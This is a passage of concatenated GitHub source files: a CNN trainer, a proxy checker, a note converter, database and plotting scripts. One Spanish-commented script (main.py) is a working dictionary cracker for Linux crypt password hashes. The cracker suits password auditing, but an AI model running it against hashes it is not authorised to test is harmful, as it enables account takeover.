camera_name = \"CAMERA_SYSTEM\"\n else:\n camera_name = \"UNKNOWN\"\n super().__init__(f\"{camera_name} - {message}\")\n else:\n super().__init__(f\"{message}\")\n\n\nclass ExposureWarning(UserWarning):\n \"\"\"Warning for exposures.\"\"\"\n\n\nclass FITSModelWarning(UserWarning):\n \"\"\"A warnings related to the FITS model.\"\"\"\n\n\nclass CardWarning(FITSModelWarning):\n \"\"\"Warning raised by a FITS `.Card`.\"\"\"\n","repo_name":"sdss/basecam","sub_path":"basecam/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73373159593","text":"#!/usr/bin/python3\nimport re, crypt, os\n\ndef main():\n hash = getUserInfo() # mostrar banner de bienvenida y pedir al usuario la informacion necesaria\n\n if not isValidHash(hash): # verificar si el hash es valido o no\n print(\"Hash invalido, por favor ingrese un hash en el formato especificado.\")\n exit(0)\n\n split_hash = re.split(\"\\$\", hash) # partir el hash en 3 partes (devuelve un arreglo de 4 partes)\n algo = getAlgo(split_hash[1]) # validar el algoritmo\n if algo is None:\n print(\"Algoritmo invalido, utilice 1 para md5, 2a para blowfish, 2y para blowfish con manejo de caracteres de 8 bits, 5 para sha256 o 6 para sha512\")\n exit(0)\n\n # imprimir informacion del algoritmo\n print(\"Algoritmo identificado: %s\" % algo['name'])\n\n decrypted_pwd = performBruteForce(split_hash)\n if decrypted_pwd is None:\n print(\"No se pudo obtener la contraseña, lo sentimos... :( \")\n exit(0)\n\n print(\"Felicidades!! La contraseña es \\\"%s\\\" (sin las comillas) :) \" % decrypted_pwd)\n\n\ndef getUserInfo():\n return input(\"Por favor ingrese el hash de la contraseña que desea desencriptar. El formato debe de ser $algoritmo$salt$contraseña: \")\n\n\ndef isValidHash(hash):\n return re.search(\"^\\$[1256]{1}[ay]{0,1}\\$[^:]*\\$[^:]*$\", hash)\n\n\ndef getAlgo(algo):\n valid_algorithms = {\n '1': {'id': '1', 'name': 'md5'},\n '2a': {'id': '2a', 'name': 'blowfish'},\n '2y': {'id': '2y', 'name': 'blowfish with correct 8 bit character support'},\n '5': {'id': '5', 'name': 'sha256'},\n '6': {'id': '6', 'name': 'sha512'}\n }\n for alg, data in valid_algorithms.items():\n if alg == algo:\n return data\n return None\n\ndef performBruteForce(split_hash):\n counter_palabras = 0\n hash_a_encontrar = \"$\" + split_hash[1] + \"$\" + split_hash[2] + \"$\" + split_hash[3]\n salt = \"$\" + split_hash[1] + \"$\" + split_hash[2]\n print(\"Buscando hash \\\"%s\\\" con salt \\\"%s\\\"\" % (hash_a_encontrar, salt))\n cwd = os.getcwd()\n for file in os.listdir(cwd):\n if file.endswith(\".txt\"):\n print(\"Buscando en archivo %s...\" % file)\n f = open(file, \"r\")\n for line in f:\n line = line.rstrip()\n counter_palabras += 1\n hash_resultante = crypt.crypt(line, salt)\n if hash_a_encontrar == hash_resultante:\n print(\"Total de lineas analizadas: %i. Archivo donde se encontro: %s\" % (counter_palabras, file))\n return line\n f.close()\n\n return None\n\nif __name__ == \"__main__\":\n main()","repo_name":"gabriel2297/decrypt-linux-pwd","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26046763409","text":"import cnnCIFAR_plots\r\nimport cnnCIFAR_utilsLoadData\r\nimport tensorflow as tf\r\nimport prettytensor as pt\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport time\r\nimport numpy as np\r\nfrom datetime import timedelta\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n# variables globales\r\nimg_size_cropped = 24\r\ntrain_batch_size = 64\r\nbatch_size = 256\r\n\r\nnum_classes_ = cnnCIFAR_utilsLoadData.num_classes\r\nimg_size_ = cnnCIFAR_utilsLoadData.img_size\r\nnum_channels_ = cnnCIFAR_utilsLoadData.num_channels\r\n\r\ndef getTestImage(i):\r\n return images_test[i, :, :, :], cls_test[i]\r\n\r\ndef preProcessImage(image, training): \r\n if training:\r\n # para la fase de entrenamiento \r\n image = tf.random_crop(image, size=[img_size_cropped, img_size_cropped, cnnCIFAR_utilsLoadData.num_channels])\r\n \r\n image = tf.image.random_flip_left_right(image)\r\n \r\n image = tf.image.random_hue(image, max_delta=0.05)\r\n image = tf.image.random_contrast(image, lower=0.3, upper=1.0)\r\n image = tf.image.random_brightness(image, max_delta=0.2)\r\n image = tf.image.random_saturation(image, lower=0.0, upper=2.0)\r\n \r\n image = tf.minimum(image, 1.0)\r\n image = tf.maximum(image, 0.0)\r\n else:\r\n image = tf.image.resize_image_with_crop_or_pad(image,\r\n target_height=img_size_cropped,\r\n target_width=img_size_cropped)\r\n return image\r\n\r\ndef preProcess(images, training): \r\n images = tf.map_fn(lambda image: preProcessImage(image, training), images)\r\n\r\n return images\r\n\r\ndef mainNetwork(images, training): \r\n x_pretty = pt.wrap(images)\r\n\r\n if training:\r\n phase = pt.Phase.train\r\n else:\r\n phase = pt.Phase.infer\r\n\r\n with pt.defaults_scope(activation_fn=tf.nn.relu, phase=phase):\r\n y_pred, loss = x_pretty.\\\r\n conv2d(kernel=5, depth=64, name='layer_conv1', batch_normalize=True).\\\r\n max_pool(kernel=2, stride=2).\\\r\n conv2d(kernel=5, depth=64, name='layer_conv2').\\\r\n max_pool(kernel=2, stride=2).\\\r\n flatten().\\\r\n fully_connected(size=256, name='layer_fc1').\\\r\n fully_connected(size=128, name='layer_fc2').\\\r\n softmax_classifier(num_classes=num_classes_, labels=y_true)\r\n\r\n return y_pred, loss \r\n\r\ndef createNetwork(training):\r\n with tf.variable_scope('network', reuse=not training):\r\n images = x\r\n images = preProcess(images=images, training=training)\r\n y_pred, loss = mainNetwork(images=images, training=training)\r\n \r\n return y_pred, loss \r\n\r\ndef randomBatch(): \r\n num_images = len(images_train) \r\n idx = np.random.choice(num_images,\r\n size=train_batch_size,\r\n replace=False) \r\n x_batch = images_train[idx, :, :, :]\r\n y_batch = labels_train[idx, :]\r\n\r\n return x_batch, y_batch\t\r\n\r\ndef optimize(num_iterations):\r\n \r\n start_time = time.time()\r\n\r\n for i in range(num_iterations): \r\n # x_batch => batch de imagenes\r\n # y_true_batch => batch de los labels de las imagenes\r\n x_batch, y_true_batch = randomBatch()\r\n\r\n # coloca los batchs en los placeholders\r\n feed_dict_train = {x: x_batch,\r\n y_true: y_true_batch}\r\n\r\n # Run the optimizer using this batch of training data.\r\n # TensorFlow assigns the variables in feed_dict_train\r\n # to the placeholder variables and then runs the optimizer.\r\n # We also want to retrieve the global_step counter.\r\n i_global, _ = session.run([global_step, optimizer],\r\n feed_dict=feed_dict_train)\r\n\r\n # imprime el estado cada 100 iterations (and last).\r\n if (i_global % 100 == 0) or (i == num_iterations - 1):\r\n # calcula la exactitud por el batch procesado\r\n batch_acc = session.run(accuracy,\r\n feed_dict=feed_dict_train) \r\n msg = \"Global Step: {0:>6}, Training Batch Accuracy: {1:>6.1%}\"\r\n print(msg.format(i_global, batch_acc))\r\n\r\n # guarda el checkpoint cada 1000 iteraciones (y la ultima).\r\n if (i_global % 1000 == 0) or (i == num_iterations - 1):\r\n # Guarda todas las variables del TensorFlow graph al\r\n # checkpoint. \r\n saver.save(session,\r\n save_path=save_path,\r\n global_step=global_step)\r\n\r\n print(\"Saved checkpoint.\")\r\n \r\n end_time = time.time() \r\n time_dif = end_time - start_time \r\n print(\"Tiempo empleado: \" + str(timedelta(seconds=int(round(time_dif)))))\r\n\r\ndef predict_cls(images, labels, cls_true):\r\n # Number of images.\r\n num_images = len(images) \r\n cls_pred = np.zeros(shape=num_images, dtype=np.int)\r\n\r\n # Prediciendo la clase por batch. \r\n i = 0\r\n\r\n while i < num_images:\r\n # The ending index for the next batch is denoted j.\r\n j = min(i + batch_size, num_images)\r\n \r\n feed_dict = {x: images[i:j, :],\r\n y_true: labels[i:j, :]}\r\n\r\n # Se predice la clase usando TensorFlow.\r\n cls_pred[i:j] = session.run(y_pred_cls, feed_dict=feed_dict) \r\n i = j\r\n\r\n # Array donde la imagen es correctamente predecida\r\n correct = (cls_true == cls_pred)\r\n return correct, cls_pred\r\n\r\ndef classification_accuracy(correct): \r\n # Retorna classification-accuracy\r\n # y el numero de clasificados correctamente.\r\n return correct.mean(), correct.sum()\r\n\r\ndef print_test_accuracy():\r\n # Para todas las imagenes en el test-set,\r\n # calcula la clase predecida y cual de ellas es correcta.\r\n correct, cls_pred = predict_cls(images = images_test, labels = labels_test, cls_true = cls_test)\r\n \r\n acc, num_correct = classification_accuracy(correct)\r\n num_images = len(correct)\r\n\r\n # Print the accuracy.\r\n msg = \"Exactitud en el Test-Set: {0:.1%} ({1} / {2})\"\r\n print(msg.format(acc, num_correct, num_images))\r\n \r\n print(\"Ejemplo de errores:\") \r\n incorrect = (correct == False)\r\n images = images_test[incorrect] \r\n # Obteniendo las clases predecidas para estas imagenes.\r\n cls_pred_errors = cls_pred[incorrect]\r\n # Obteniendo las clases verdaderas para estas imagenes.\r\n cls_true_errors = cls_test[incorrect]\r\n\r\n # Plot some examples of mis-classifications, if desired.\r\n cnnCIFAR_plots.plot_images('Ejemplos de errores de prediccion', class_names, images=images[0:9], cls_true=cls_true_errors[0:9], cls_pred=cls_pred_errors[0:9])\r\n\r\n # Plot matriz de confunsion\r\n cm = confusion_matrix(y_true=cls_test, # True class for test-set.\r\n y_pred=cls_pred) # Predicted class.\r\n\r\n # Imprime la matriz de confunsion como texto.\r\n for i in range(num_classes_):\r\n # Append the class-name to each line.\r\n class_name = \"({}) {}\".format(i, class_names[i])\r\n print(cm[i, :], class_name)\r\n\r\n # Imprimiendo las clases.\r\n class_numbers = [\" ({0})\".format(i) for i in range(num_classes_)]\r\n print(\"\".join(class_numbers)) \r\n\r\ndef testCNN(array):\r\n for elem in array: \r\n img, cls = getTestImage(elem)\r\n label_pred, cls_pred = session.run([y_pred, y_pred_cls], feed_dict={x: [img]})\r\n np.set_printoptions(precision=3, suppress=True) \r\n cnnCIFAR_plots.plot_image(img, class_names[cls], class_names[cls_pred[0]])\r\n \r\nif __name__ == \"__main__\":\r\n \r\n\t# cnnCIFAR_utilsLoadData\t\r\n\tprint(\"\\t \\t === CARGANDO DATA ===\")\r\n\tclass_names = cnnCIFAR_utilsLoadData.loadClassNames()\r\n\timages_train, cls_train, labels_train = cnnCIFAR_utilsLoadData.loadTrainingData()\r\n\timages_test, cls_test, labels_test = cnnCIFAR_utilsLoadData.loadTestData()\r\n\tprint(\"Size of:\")\r\n\tprint(\"- Training-set:\\t\\t{}\".format(len(images_train)))\r\n\tprint(\"- Test-set:\\t\\t{}\".format(len(images_test)))\r\n\t\t\r\n\t# Plot the images and labels using our helper-function above.\r\n\t#cnnCIFAR_plots.plot_images('imagenes al azar', class_names, images=images_test[0:9], cls_true=cls_test[0:9], smooth=True)\r\n\r\n\tprint(\"\\t \\t === LEVANTANDO RED NEURONAL ===\")\t\r\n\t# PLACEHOLDERS \r\n\tprint(\"\\t \\t === CREANDO PLACEHOLDERS === \")\t\r\n\tx = tf.placeholder(tf.float32, shape=[None, img_size_, img_size_, num_channels_], name='x')\r\n\ty_true = tf.placeholder(tf.float32, shape=[None, num_classes_], name='y_true')\r\n\ty_true_cls = tf.argmax(y_true, dimension=1)\r\n\tprint(\"\\t \\t === PLACEHOLDERS CREADOS === \\n\")\r\n\r\n\t# CREATE TRAINING NETWORK\r\n\tglobal_step = tf.Variable(initial_value=0, name='global_step', trainable=False)\r\n\t# red neuronal para training\r\n\t_, loss = createNetwork(training=True)\r\n\t# optimiza la los-function\r\n\toptimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(loss, global_step=global_step)\r\n\tprint(\"\\t \\t === RED DE TRAINING CREADA === \\n\")\r\n\r\n\t# CREATE TESTING NETWORK \r\n\ty_pred,_ = createNetwork(training=False)\r\n\ty_pred_cls = tf.argmax(y_pred, dimension=1)\r\n\tcorrect_prediction = tf.equal(y_pred_cls, y_true_cls)\r\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\tprint(\"\\t \\t === RED DE TESTING CREADA === \\n\\n\")\r\n\r\n\tprint(\"\\t \\t === EJECUTANDO RED NEURONAL === \")\r\n\tsaver = tf.train.Saver()\r\n\r\n\tsession = tf.Session()\r\n\tsave_dir = 'checkpoints/'\r\n\tif not os.path.exists(save_dir):\r\n\t\tos.makedirs(save_dir)\r\n\tsave_path = os.path.join(save_dir, 'cifar10_cnn')\r\n\ttry:\r\n\t print(\"Intentando restaurar el ultimo punto\")\t \r\n\t last_chk_path = tf.train.latest_checkpoint(checkpoint_dir=save_dir)\r\n\r\n\t # cargando la data desde el ultimo punto\r\n\t saver.restore(session, save_path=last_chk_path)\r\n\t \r\n\t print(\"Checkpoint restaurado desde \", last_chk_path)\r\n\texcept:\r\n\t # If the above failed for some reason, simply\r\n\t print(\"Fallo la restauracion del checkpoint. Inicializando las variables\")\r\n\t session.run(tf.global_variables_initializer())\r\n\r\n\tif False:\r\n\t\toptimize(num_iterations=20000)\r\n\r\n \t#mostrando la precision\r\n\tprint_test_accuracy()\r\n\r\n # realizando un test a la red neuronal\r\n\tarrayTest = [16, 69, 100, 239, 341]\r\n\ttestCNN(arrayTest)\r\n\r\n\r\n","repo_name":"marbramen/CNN_CIFAR","sub_path":"cnnCIFAR_run.py","file_name":"cnnCIFAR_run.py","file_ext":"py","file_size_in_byte":10253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29556374306","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom conjugate_gradient import conjugate_gradient_2\nfrom utils import CG_COLOR\n\nif __name__ == '__main__':\n\n # Problem formulation\n A = np.array([[4, 3, 0],\n [3, 4, -1],\n [0, -1, 4]])\n b = np.array([[24],\n [30],\n [-24]])\n\n x0 = np.array([[0, 0, 0]])\n x0 = x0.T\n\n err_code, x_star, steps, iters, proc_time, cg_norms = conjugate_gradient_2(A, b, 1e-10, 1_000)\n print(x_star)\n print(iters)\n\n # plotting the steps\n xs = [x[0] for x in steps]\n ys = [y[1] for y in steps]\n zs = [y[2] for y in steps]\n\n fig = plt.figure(figsize=(12, 12), dpi=400)\n ax = fig.add_subplot(111, projection='3d')\n ax.plot(xs, ys, zs, marker='x', linestyle='--', color=CG_COLOR)\n\n for x, y, z in zip(xs, ys, zs):\n label = f'({x:.2f}, {y:.2f}, {z:.2f})'\n ax.text(x, y, z, label)\n\n ax.set_xlabel('x1')\n ax.set_ylabel('x2')\n ax.set_zlabel('x3')\n # plt.show()\n plt.savefig('./plots/3d-plot.png', bbox_inches='tight')\n","repo_name":"hydenp/appm-4600-final-project","sub_path":"graph_steps.py","file_name":"graph_steps.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41789402166","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport requests,threading,datetime\r\nfrom bs4 import BeautifulSoup\r\nimport random\r\n\r\n\"\"\"\r\n1、抓取西刺代理网站的代理ip\r\n2、并根据指定的目标url,对抓取到ip的有效性进行验证\r\n3、最后存到指定的path\r\n\"\"\"\r\n\r\n# ------------------------------------------------------文档处理--------------------------------------------------------\r\n# 写入文档\r\ndef write(path,text):\r\n with open(path,'a', encoding='utf-8') as f:\r\n f.writelines(text)\r\n f.write('\\n')\r\n# 清空文档\r\ndef truncatefile(path):\r\n with open(path, 'w', encoding='utf-8') as f:\r\n f.truncate()\r\n# 读取文档\r\ndef read(path):\r\n with open(path, 'r', encoding='utf-8') as f:\r\n txt = []\r\n for s in f.readlines():\r\n txt.append(s.strip())\r\n return txt\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# 计算时间差,格式: 时分秒\r\ndef gettimediff(start,end):\r\n seconds = (end - start).seconds\r\n m, s = divmod(seconds, 60)\r\n h, m = divmod(m, 60)\r\n diff = (\"%02d:%02d:%02d\" % (h, m, s))\r\n return diff\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# 返回一个随机的请求头 headers\r\ndef getheaders():\r\n user_agent_list = [ \\\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\" \\\r\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\", \\\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1\", \\\r\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5\", \\\r\n \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5\", \\\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\"\r\n ]\r\n UserAgent=random.choice(user_agent_list)\r\n headers = {'User-Agent': UserAgent}\r\n return headers\r\n# -----------------------------------------------------检查ip是否可用----------------------------------------------------\r\ndef checkip(targeturl,ip):\r\n headers =getheaders() # 定制请求头\r\n proxies = {\"http\": \"http://\"+ip, \"https\": \"http://\"+ip} # 代理ip\r\n try:\r\n response=requests.get(url=targeturl,proxies=proxies,headers=headers,timeout=5).status_code\r\n if response == 200 :\r\n return True\r\n else:\r\n return False\r\n except:\r\n return False\r\n\r\n#-------------------------------------------------------获取代理方法----------------------------------------------------\r\n# 免费代理 XiciDaili\r\ndef findip(iplist, start, end, targeturl, path): # ip类型,页码,目标url,存放ip的路径\r\n for i in range(start, end):\r\n ip = iplist[i]\r\n is_avail = checkip(targeturl,ip)\r\n print(ip,'checking')\r\n if is_avail == True:\r\n write(path=path,text=ip)\r\n print(ip, 'success')\r\n else:\r\n print(ip, 'fail')\r\n\r\n#-----------------------------------------------------多线程抓取ip入口---------------------------------------------------\r\ndef getip(iplist, targeturl,path):\r\n truncatefile(path) # 爬取前清空文档\r\n start = datetime.datetime.now() # 开始时间\r\n threads=[]\r\n indexes = []\r\n for i in range(200):\r\n indexes.append(i*18)\r\n for i in range(199):\r\n t=threading.Thread(target=findip,args=(iplist, indexes[i], indexes[i+1], targeturl, path))\r\n #t=threading.Thread(target=findip,args=(4,pagenum+1,targeturl,path))\r\n threads.append(t)\r\n print('开始爬取代理ip')\r\n for s in threads: # 开启多线程爬取\r\n s.start()\r\n for e in threads: # 等待所有线程结束\r\n e.join()\r\n print('爬取完成')\r\n end = datetime.datetime.now() # 结束时间\r\n diff = gettimediff(start, end) # 计算耗时\r\n ips = read(path) # 读取爬到的ip数量\r\n print('一共爬取代理ip: %s 个,共耗时: %s \\n' % (len(ips), diff))\r\n\r\n#-------------------------------------------------------启动-----------------------------------------------------------\r\nif __name__ == '__main__':\r\n f = open('ip0.txt','r')\r\n iplist = f.readlines()\r\n lenOfIP = len(iplist)\r\n for i in range(lenOfIP):\r\n iplist[i] = iplist[i].split('//')[-1][:-2]\r\n f.close()\r\n path = 'ip.txt' # 存放爬取ip的文档path\r\n targeturl = 'https://www.baidu.com/' # 验证ip有效性的指定urlhttps://scholar.google.com.hk/scholar?hl=zh-CN&as_sdt=0%2C5&q=XinbingWang&btnG=\r\n getip(iplist, targeturl,path)","repo_name":"yuemonangong/Scholar-picture","sub_path":"crawler/temp/ip2.py","file_name":"ip2.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39855297368","text":"import os\nimport re\nimport json\nimport cson\nimport tkinter\nimport tkinter.filedialog\n\n\ndef convert_to_name(dir_key, conf):\n \"\"\"Convert from directory key to directory name\n\n :param str dir_key: key in boostnote.json/folders/key\n :param dict conf: dictionary converted from boostnote.json\n :rtype: str\n :return: directory name\n \"\"\"\n\n return [meta['name'] for meta in conf['folders'] if meta['key'] == dir_key]\n\n\ndef sanitize(str_):\n \"\"\"Sanitize string for Windows\n\n target: \\\\/:,*?<>|\n\n :param str str_: string you want to sanitize\n :rtype: string\n :return: sanitized string\n \"\"\"\n\n if re.search('[\\\\/:,*?<>|]', str_) is None:\n return str_\n\n str_ = str_.replace('\\\\', '[backslash]')\n str_ = str_.replace('/', '[spash]')\n str_ = str_.replace(':', '[colon]')\n str_ = str_.replace(',', '[hyphen]')\n str_ = str_.replace('*', '[star]')\n str_ = str_.replace('?', '[question]')\n str_ = str_.replace('<', '[less]')\n str_ = str_.replace('>', '[greater]')\n\n print(f'\"{str_}\" is sanitized')\n\n return str_\n\n\ndef extract_md_from_BoostNote():\n \"\"\"Extract Markdown from BoostNote\n \"\"\"\n\n cnt_success = 0\n cnt_skip = 0\n\n root = tkinter.Tk()\n root.withdraw()\n msg = 'Select your BoostNote working directory'\n boostnote = tkinter.filedialog.askdirectory(title=msg)\n conf_json = os.path.join(boostnote, 'boostnote.json')\n with open(conf_json) as f:\n conf = json.load(f)\n\n notes = os.path.join(boostnote, 'notes')\n for file in os.listdir(notes):\n with open(os.path.join(notes, file)) as f:\n note = cson.load(f)\n\n if note['type'] != 'MARKDOWN_NOTE':\n cnt_skip += 1\n continue\n\n key = note['folder']\n folder = convert_to_name(key, conf)\n title = note['title']\n content = note['content']\n\n if note['isTrashed']:\n folder = 'Trash'\n\n folder = sanitize(folder)\n title = sanitize(title)\n\n output_dir = os.path.join(boostnote, 'markdown', folder)\n os.makedirs(output_dir, exist_ok=True)\n output_file_name = title + '.md'\n output_file = os.path.join(output_dir, output_file_name)\n\n with open(output_file, 'w') as f:\n f.write(content)\n\n cnt_success += 1\n\n print('=============================================')\n print('Converting BoostNote to Markdown is Success!!')\n print(f'success: \\t{cnt_success}')\n print(f'skip: \\t{cnt_skip}')\n\n\nif __name__ == '__main__':\n extract_md_from_BoostNote()\n","repo_name":"dorapon2000/boostnote2markdown","sub_path":"boostnote_to_markdown.py","file_name":"boostnote_to_markdown.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22944254775","text":"###############################################################################################\n# FUNCIÓN QUE INSERTA DATOS DESDE .XLSX FILE EN LA TABLA DE CLIENTES EN SQL SERVER\n###############################################################################################\n\nimport xlrd\nimport pyodbc\nfrom datetime import date\nfrom datetime import datetime\nimport re\n\ndef InsertarClientes(parameter_path):\n\n #Libro excel + hoja de trabajo\n Path = str(parameter_path)\n book = xlrd.open_workbook(Path)\n sheet = book.sheet_by_name('clientes')\n\n #Conexión con la bd\n conn = pyodbc.connect('Driver={SQL Server};' \n 'Server=DESKTOP-8LT275E\\SQLEXPRESS;'\n 'Database=DB_PYTHON;'\n 'Trusted_Connection=yes;')\n\n cursor = conn.cursor()\n\n #Creación de archivos .txt para informes\n f = open(\"Revisar_DIA.txt\",\"w+\")\n d = open(\"Revisar_MES.txt\",\"w+\")\n\n Nombre = \"\"\n Apellido = \"\"\n\n for i in range(1, sheet.nrows):\n\n Id = sheet.cell(i, 0).value\n Cod_Tip_Doc = sheet.cell(i, 1).value\n Cod_Genero = sheet.cell(i, 2).value\n Nombre_Completo = sheet.cell(i, 4).value\n Fecha_Nacimiento = sheet.cell(i, 5).value\n Fecha_Nacimiento = str(Fecha_Nacimiento)\n Ingresos = sheet.cell(i, 6).value\n Cod_Sucursal = sheet.cell(i, 7).value\n \n #Manejo de fecha de nacimiento para calcular edad\n Edad = sheet.cell(i, 5).value\n Edad = re.sub('[^0-9]', '', str(Edad))\n año = Edad[0:4]\n mes = Edad[4:6]\n dia = Edad[6:8]\n if mes == '02' and dia == '29':\n dia = '28'\n #Llenado de .txt\n f.write(\"Nombre :\"+ str(Nombre_Completo) +\"Documento :\" + str(Id) + '\\n')\n elif mes == '00':\n mes = '01'\n d.write(\"Nombre\"+ str(Nombre_Completo) +\"Documento :\" + str(Id) + '\\n')\n\n Fecha = año + '-' + mes + '-' + dia\n\n #Día actual\n today = date.today()\n datetime_object = datetime.strptime(Fecha, '%Y-%m-%d').date()\n años = ((today - datetime_object) / 365.25)\n años = re.sub('[^0-9]', '', str(años))\n Edad = int(años[0:2])\n #Fin manejo de fecha de nacimiento para calcular edad\n\n #Separando nombres y apellidos según len\n lista = Nombre_Completo.split()\n if len(lista) == 1:\n Nombre = lista[0]\n elif len(lista) == 2:\n Nombre = lista[0]\n Apellido = lista[1]\n elif len(lista) == 3:\n Nombre = lista[0]\n Apellido = lista[1] + ' ' + lista[2]\n elif len(lista) == 4:\n Nombre = lista[0] + ' ' + lista[1]\n Apellido = lista[2] + ' ' + lista[3]\n elif len(lista) >= 5:\n Nombre = lista[0] + ' ' + lista[1] + ' ' + lista[2]\n Apellido = lista[3] + ' ' + lista[4]\n #fin separando nombres y apellidos según len\n\n query = '''INSERT INTO CLIENTES \n (Id, Cod_Tip_Doc, Cod_Genero, Nombre_Completo, Nombre, Apellido, Fecha_Nacimiento, Ingresos, Cod_Sucursal,Edad) \n VALUES (?,?,?,?,?,?,?,?,?,?)'''\n values = (Id, Cod_Tip_Doc, Cod_Genero, Nombre_Completo, Nombre,\n Apellido, Fecha_Nacimiento, Ingresos, Cod_Sucursal, Edad)\n cursor.execute(query, values)\n conn.commit()\n\n print(\"Se insertaron : \" + str(sheet.nrows - 1) +\n \" registros en la tabla CLIENTES\")\n cursor.close()\n conn.close()\n f.close()","repo_name":"Julianoquendogr/PYTHON_DB","sub_path":"CLIENTES.py","file_name":"CLIENTES.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"526055707","text":"import numpy as np\r\nimport os\r\nimport torch\r\nfrom torch.utils.data import Dataset, DataLoader\r\n\r\n\r\nroot_dir = \"\"\r\ntrain_feature = os.path.join(root_dir, 'x_train.npy')\r\ntrain_label = os.path.join(root_dir, 'y_train.npy')\r\nval_feature = os.path.join(root_dir, \"x_test.npy\")\r\nval_label = os.path.join(root_dir, 'y_test.npy')\r\n\r\n\"\"\"\r\nbatch_size should equal to n: 100\r\n\"\"\"\r\n\r\nclass FilterDataset(Dataset):\r\n def __init__(self, feature_path, label_path):\r\n self.feature = np.load(feature_path)\r\n self.label = np.load(label_path)\r\n\r\n def __len__(self):\r\n return len(self.feature)\r\n\r\n def __getitem__(self, idx):\r\n f = self.feature[idx, :]\r\n l = self.label[idx, :]\r\n\r\n # convert to tensor\r\n f = torch.from_numpy(f.copy()).float()\r\n l = torch.from_numpy(l.copy()).float()\r\n l = l.unsqueeze(1)\r\n\r\n return f, l\r\n\r\n\r\nif __name__ == \"__main__\":\r\n train_data = FilterDataset(feature_path=train_feature, label_path=train_label)\r\n\r\n # show a batch\r\n batch_size = 5\r\n\r\n for i in range(batch_size):\r\n feature, label = train_data[i]\r\n print(i, feature.size(), label.size())\r\n\r\n dataloader = DataLoader(train_data, batch_size=batch_size, shuffle=False, num_workers=4)\r\n\r\n for i, batch in enumerate(dataloader):\r\n print(i, batch[0].size(), batch[1].size())\r\n","repo_name":"calibertytz/Neural-particle-filter","sub_path":"filterdata_loader.py","file_name":"filterdata_loader.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2953059698","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 3 08:46:58 2019\n\n@author: stewjo\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nA= np.random.rand(128,128)\nA[:,:]= 0.0\nA[30:40,0] = 